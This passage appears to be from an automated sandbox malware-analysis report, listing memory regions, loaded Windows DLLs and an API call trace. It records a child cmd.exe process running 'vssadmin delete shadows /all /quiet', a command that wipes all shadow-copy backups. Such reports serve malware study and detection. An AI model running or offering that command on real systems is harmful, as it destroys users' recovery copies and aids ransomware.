private name = "private_0x00007ff71e93e000" filename = "" Region: id = 174 start_va = 0x7ff71ef00000 end_va = 0x7ff71ef10fff entry_point = 0x7ff71ef00000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 175 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 176 start_va = 0xb3a0b0000 end_va = 0xb3a1affff entry_point = 0x0 region_type = private name = "private_0x0000000b3a0b0000" filename = "" Region: id = 177 start_va = 0x7ff8eb870000 end_va = 0x7ff8eba4cfff entry_point = 0x7ff8eb870000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 178 start_va = 0x7ff8ee2d0000 end_va = 0x7ff8ee37cfff entry_point = 0x7ff8ee2d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 179 start_va = 0xb39fd0000 end_va = 0xb39fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b39fd0000" filename = "" Region: id = 180 start_va = 0xb3a050000 end_va = 0xb3a08ffff entry_point = 0x0 region_type = private name = "private_0x0000000b3a050000" filename = "" Region: id = 181 start_va = 0xb3a1b0000 end_va = 0xb3a26dfff entry_point = 0xb3a1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 182 start_va = 0x7ff71e810000 end_va = 0x7ff71e90ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff71e810000" filename = "" Region: id = 183 start_va = 0x7ff71e93c000 end_va = 0x7ff71e93dfff entry_point = 0x0 region_type = private name = "private_0x00007ff71e93c000" filename = "" Region: id = 184 start_va = 0x7ff8ee0b0000 end_va = 0x7ff8ee14cfff entry_point = 0x7ff8ee0b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 185 start_va = 0xb39fe0000 end_va = 0xb39fe6fff entry_point = 0x0 region_type = private name = "private_0x0000000b39fe0000" filename = "" Region: id = 186 start_va = 0xb3a090000 end_va = 0xb3a090fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3a090000" filename = "" Region: id = 187 start_va = 0xb3a0a0000 end_va = 0xb3a0a6fff entry_point = 0x0 region_type = private name = "private_0x0000000b3a0a0000" filename = "" Region: id = 188 start_va = 0xb3a3d0000 end_va = 0xb3a3dffff entry_point = 0x0 region_type = private name = "private_0x0000000b3a3d0000" filename = "" Region: id = 189 start_va = 0x7ff8db5b0000 end_va = 0x7ff8db602fff entry_point = 0x7ff8db5b0000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 190 start_va = 0x7ff8e79b0000 end_va = 0x7ff8e7b32fff entry_point = 0x7ff8e79b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 191 start_va = 0x7ff8ebb30000 end_va = 0x7ff8ebbedfff entry_point = 0x7ff8ebb30000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 192 start_va = 0x7ff8ebdc0000 end_va = 0x7ff8ebf0dfff entry_point = 0x7ff8ebdc0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 193 start_va = 0x7ff8ec0c0000 end_va = 0x7ff8ec21bfff entry_point = 0x7ff8ec0c0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 194 start_va = 0x7ff8ec240000 end_va = 0x7ff8ec29afff entry_point = 0x7ff8ec240000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 195 start_va = 0x7ff8ec300000 end_va = 0x7ff8ec440fff entry_point = 0x7ff8ec300000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 196 start_va = 0x7ff8ec450000 end_va = 0x7ff8ec575fff entry_point = 0x7ff8ec450000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 197 start_va = 0x7ff8edbc0000 end_va = 0x7ff8edd44fff entry_point = 0x7ff8edbc0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 198 start_va = 0x7ff8edd60000 end_va = 0x7ff8edfdbfff entry_point = 0x7ff8edd60000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 199 start_va = 0x7ff8ee150000 end_va = 0x7ff8ee185fff entry_point = 0x7ff8ee150000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 200 start_va = 0xb3a270000 end_va = 0xb3a270fff entry_point = 0x0 region_type = private name = "private_0x0000000b3a270000" filename = "" Region: id = 201 start_va = 0xb3a280000 end_va = 0xb3a280fff entry_point = 0x0 region_type = private name = "private_0x0000000b3a280000" filename = "" Region: id = 202 start_va = 0xb3a290000 end_va = 0xb3a2cffff entry_point = 0x0 region_type = private name = "private_0x0000000b3a290000" filename = "" Region: id = 203 start_va = 0xb3a3e0000 end_va = 0xb3a567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3a3e0000" filename = "" Region: id = 204 start_va = 0xb3a570000 end_va = 0xb3a6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3a570000" filename = "" Region: id = 205 start_va = 0xb3a700000 end_va = 0xb3bafffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3a700000" filename = "" Region: id = 206 start_va = 0xb3bc60000 end_va = 0xb3bc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000b3bc60000" filename = "" Region: id = 207 start_va = 0x7ff71e93a000 end_va = 0x7ff71e93bfff entry_point = 0x0 region_type = private name = "private_0x00007ff71e93a000" filename = "" Region: id = 208 start_va = 0x7ff8eadd0000 end_va = 0x7ff8eae19fff entry_point = 0x7ff8eadd0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 209 start_va = 0x7ff8eae20000 end_va = 0x7ff8eae2efff entry_point = 0x7ff8eae20000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 210 start_va = 0x7ff8eae30000 end_va = 0x7ff8eae42fff entry_point = 0x7ff8eae30000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 211 start_va = 0x7ff8eb180000 end_va = 0x7ff8eb7a7fff entry_point = 0x7ff8eb180000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 212 start_va = 0x7ff8eb7b0000 end_va = 0x7ff8eb862fff entry_point = 0x7ff8eb7b0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 213 start_va = 0x7ff8ec580000 end_va = 0x7ff8edaa4fff entry_point = 0x7ff8ec580000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 214 start_va = 0x7ff8edfe0000 end_va = 0x7ff8ee030fff entry_point = 0x7ff8edfe0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 215 start_va = 0x7ff8ee190000 end_va = 0x7ff8ee235fff entry_point = 0x7ff8ee190000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 216 start_va = 0x7ff8e9680000 end_va = 0x7ff8e9715fff entry_point = 0x7ff8e9680000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 217 start_va = 0xb3a010000 end_va = 0xb3a04ffff entry_point = 0x0 region_type = private name = "private_0x0000000b3a010000" filename = "" Region: id = 218 start_va = 0xb3a2d0000 end_va = 0xb3a387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3a2d0000" filename = "" Region: id = 219 start_va = 0xb3a390000 end_va = 0xb3a393fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3a390000" filename = "" Region: id = 220 start_va = 0xb3a3a0000 end_va = 0xb3a3affff entry_point = 0x0 region_type = private name = "private_0x0000000b3a3a0000" filename = "" Region: id = 221 start_va = 0xb3bb00000 end_va = 0xb3bc0dfff entry_point = 0x0 region_type = private name = "private_0x0000000b3bb00000" filename = "" Region: id = 222 start_va = 0xb3bc70000 end_va = 0xb3bfa6fff entry_point = 0xb3bc70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 223 start_va = 0xb3bfb0000 end_va = 0xb3c1c0fff entry_point = 0x0 region_type = private name = "private_0x0000000b3bfb0000" filename = "" Region: id = 224 start_va = 0xb3c1d0000 end_va = 0xb3c3e2fff entry_point = 0x0 region_type = private name = "private_0x0000000b3c1d0000" filename = "" Region: id = 225 start_va = 0xb3c3f0000 end_va = 0xb3c609fff entry_point = 0x0 region_type = private name = "private_0x0000000b3c3f0000" filename = "" Region: id = 226 start_va = 0xb3c610000 end_va = 0xb3c726fff entry_point = 0x0 region_type = private name = "private_0x0000000b3c610000" filename = "" Region: id = 227 start_va = 0x7ff71e93e000 end_va = 0x7ff71e93ffff entry_point = 0x0 region_type = private name = "private_0x00007ff71e93e000" filename = "" Region: id = 228 start_va = 0x7ff8e8fb0000 end_va = 0x7ff8e8fd1fff entry_point = 0x7ff8e8fb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 229 start_va = 0x7ff8e8ad0000 end_va = 0x7ff8e8ae2fff entry_point = 0x7ff8e8ad0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 230 start_va = 0x7ff8ea820000 end_va = 0x7ff8ea877fff entry_point = 0x7ff8ea820000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 231 start_va = 0xb3a3b0000 end_va = 0xb3a3b6fff entry_point = 0x0 region_type = private name = "private_0x0000000b3a3b0000" filename = "" Region: id = 232 start_va = 0xb3a3c0000 end_va = 0xb3a3c4fff entry_point = 0xb3a3c0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 233 start_va = 0xb3bc10000 end_va = 0xb3bc10fff entry_point = 0xb3bc10000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 234 start_va = 0xb3bc20000 end_va = 0xb3bc21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3bc20000" filename = "" Region: id = 235 start_va = 0xb3c730000 end_va = 0xb3c925fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3c730000" filename = "" Region: id = 236 start_va = 0x7ff8e57b0000 end_va = 0x7ff8e5a23fff entry_point = 0x7ff8e57b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 237 start_va = 0xb3bc30000 end_va = 0xb3bc30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3bc30000" filename = "" Region: id = 238 start_va = 0xb3bc40000 end_va = 0xb3bc41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b3bc40000" filename = "" Region: id = 239 start_va = 0x7ff8eac00000 end_va = 0x7ff8eac6afff entry_point = 0x7ff8eac00000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Thread: id = 2 os_tid = 0x250 Thread: id = 3 os_tid = 0x2ec Thread: id = 4 os_tid = 0xbec Thread: id = 5 os_tid = 0x5fc Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x48b54000" os_pid = "0xcb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x56c" cmd_line = "cmd /c vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 456 start_va = 0x6a0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 457 start_va = 0x6c0000 end_va = 0x6c0fff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 458 start_va = 0x6d0000 end_va = 0x6e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 459 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 460 start_va = 0x730000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 461 start_va = 0xe10000 end_va = 0xe5ffff entry_point = 0xe10000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 462 start_va = 0xe60000 end_va = 0x4e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 463 start_va = 0x77ca0000 end_va = 0x77e18fff entry_point = 0x77ca0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 464 start_va = 0x7ed90000 end_va = 0x7edb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed90000" filename = "" Region: id = 465 start_va = 0x7edb8000 end_va = 0x7edb8fff entry_point = 0x0 region_type = private name = "private_0x000000007edb8000" filename = "" Region: id = 466 start_va = 0x7edb9000 end_va = 0x7edb9fff entry_point = 0x0 region_type = private name = "private_0x000000007edb9000" filename = "" Region: id = 467 start_va = 0x7edbd000 end_va = 0x7edbffff entry_point = 0x0 region_type = private name = "private_0x000000007edbd000" filename = "" Region: id = 468 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 469 start_va = 0x7fff0000 end_va = 0x7df8ee37ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 470 start_va = 0x7df8ee380000 end_va = 0x7ff8ee37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df8ee380000" filename = "" Region: id = 471 start_va = 0x7ff8ee380000 end_va = 0x7ff8ee541fff entry_point = 0x7ff8ee380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 472 start_va = 0x7ff8ee542000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff8ee542000" filename = "" Region: id = 473 start_va = 0x830000 end_va = 0x833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 474 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 475 start_va = 0x850000 end_va = 0x851fff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 476 start_va = 0xa40000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 477 start_va = 0x64af0000 end_va = 0x64b62fff entry_point = 0x64af0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 478 start_va = 0x64b70000 end_va = 0x64bbefff entry_point = 0x64b70000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 479 start_va = 0x64ae0000 end_va = 0x64ae7fff entry_point = 0x64ae0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 480 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 481 start_va = 0x860000 end_va = 0x91dfff entry_point = 0x860000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 482 start_va = 0xb90000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 483 start_va = 0x74e70000 end_va = 0x74fe5fff entry_point = 0x74e70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 484 start_va = 0x75260000 end_va = 0x7534ffff entry_point = 0x75260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 485 start_va = 0x7ec90000 end_va = 0x7ed8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec90000" filename = "" Region: id = 486 start_va = 0x920000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 487 start_va = 0xa50000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 488 start_va = 0x779f0000 end_va = 0x77aadfff entry_point = 0x779f0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 489 start_va = 0x7edba000 end_va = 0x7edbcfff entry_point = 0x0 region_type = private name = "private_0x000000007edba000" filename = "" Region: id = 490 start_va = 0x4fe0000 end_va = 0x4feffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 491 start_va = 0x6b0000 end_va = 0x6b3fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 492 start_va = 0x6c0000 end_va = 0x6c3fff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 493 start_va = 0x4ff0000 end_va = 0x5326fff entry_point = 0x4ff0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 12 os_tid = 0xcb8 [0120.034] GetModuleHandleA (lpModuleName=0x0) returned 0xe10000 [0120.034] __set_app_type (_Type=0x1) [0120.034] __p__fmode () returned 0x77aa4d6c [0120.034] __p__commode () returned 0x77aa5b1c [0120.034] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe236e0) returned 0x0 [0120.034] __getmainargs (in: _Argc=0xe350e8, _Argv=0xe350ec, _Env=0xe350f0, _DoWildCard=0, _StartInfo=0xe350fc | out: _Argc=0xe350e8, _Argv=0xe350ec, _Env=0xe350f0) returned 0 [0120.034] GetCurrentThreadId () returned 0xcb8 [0120.035] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb8) returned 0x84 [0120.035] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0120.035] GetProcAddress (hModule=0x75260000, lpProcName="SetThreadUILanguage") returned 0x752a2780 [0120.035] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.038] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.038] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x82f828 | out: phkResult=0x82f828*=0x0) returned 0x2 [0120.039] VirtualQuery (in: lpAddress=0x82f82f, lpBuffer=0x82f7e0, dwLength=0x1c | out: lpBuffer=0x82f7e0*(BaseAddress=0x82f000, AllocationBase=0x730000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.039] VirtualQuery (in: lpAddress=0x730000, lpBuffer=0x82f7e0, dwLength=0x1c | out: lpBuffer=0x82f7e0*(BaseAddress=0x730000, AllocationBase=0x730000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0120.039] VirtualQuery (in: lpAddress=0x731000, lpBuffer=0x82f7e0, dwLength=0x1c | out: lpBuffer=0x82f7e0*(BaseAddress=0x731000, AllocationBase=0x730000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0120.039] VirtualQuery (in: lpAddress=0x733000, lpBuffer=0x82f7e0, dwLength=0x1c | out: lpBuffer=0x82f7e0*(BaseAddress=0x733000, AllocationBase=0x730000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.039] VirtualQuery (in: lpAddress=0x830000, lpBuffer=0x82f7e0, dwLength=0x1c | out: lpBuffer=0x82f7e0*(BaseAddress=0x830000, AllocationBase=0x830000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0120.039] GetConsoleOutputCP () returned 0x1b5 [0120.039] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe3e460 | out: lpCPInfo=0xe3e460) returned 1 [0120.040] SetConsoleCtrlHandler (HandlerRoutine=0xe2f980, Add=1) returned 1 [0120.040] _get_osfhandle (_FileHandle=1) returned 0xc [0120.040] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x0) returned 1 [0120.040] _get_osfhandle (_FileHandle=1) returned 0xc [0120.040] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0xe3e40c | out: lpMode=0xe3e40c) returned 1 [0120.040] _get_osfhandle (_FileHandle=1) returned 0xc [0120.040] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0120.040] _get_osfhandle (_FileHandle=0) returned 0x8 [0120.040] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0xe3e408 | out: lpMode=0xe3e408) returned 1 [0120.041] _get_osfhandle (_FileHandle=0) returned 0x8 [0120.041] SetConsoleMode (hConsoleHandle=0x8, dwMode=0x1e7) returned 1 [0120.041] GetEnvironmentStringsW () returned 0xb97d98* [0120.041] FreeEnvironmentStringsA (penv="A") returned 1 [0120.041] GetEnvironmentStringsW () returned 0xb97d98* [0120.041] FreeEnvironmentStringsA (penv="A") returned 1 [0120.041] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x82e78c | out: phkResult=0x82e78c*=0x94) returned 0x0 [0120.041] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x0, lpData=0x82e798*=0x38, lpcbData=0x82e794*=0x1000) returned 0x2 [0120.041] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x4, lpData=0x82e798*=0x1, lpcbData=0x82e794*=0x4) returned 0x0 [0120.041] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x0, lpData=0x82e798*=0x1, lpcbData=0x82e794*=0x1000) returned 0x2 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x4, lpData=0x82e798*=0x0, lpcbData=0x82e794*=0x4) returned 0x0 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x4, lpData=0x82e798*=0x40, lpcbData=0x82e794*=0x4) returned 0x0 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x4, lpData=0x82e798*=0x40, lpcbData=0x82e794*=0x4) returned 0x0 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x0, lpData=0x82e798*=0x40, lpcbData=0x82e794*=0x1000) returned 0x2 [0120.042] RegCloseKey (hKey=0x94) returned 0x0 [0120.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x82e78c | out: phkResult=0x82e78c*=0x94) returned 0x0 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x0, lpData=0x82e798*=0x40, lpcbData=0x82e794*=0x1000) returned 0x2 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x4, lpData=0x82e798*=0x1, lpcbData=0x82e794*=0x4) returned 0x0 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x0, lpData=0x82e798*=0x1, lpcbData=0x82e794*=0x1000) returned 0x2 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x4, lpData=0x82e798*=0x0, lpcbData=0x82e794*=0x4) returned 0x0 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x4, lpData=0x82e798*=0x9, lpcbData=0x82e794*=0x4) returned 0x0 [0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x4, lpData=0x82e798*=0x9, lpcbData=0x82e794*=0x4) returned 0x0 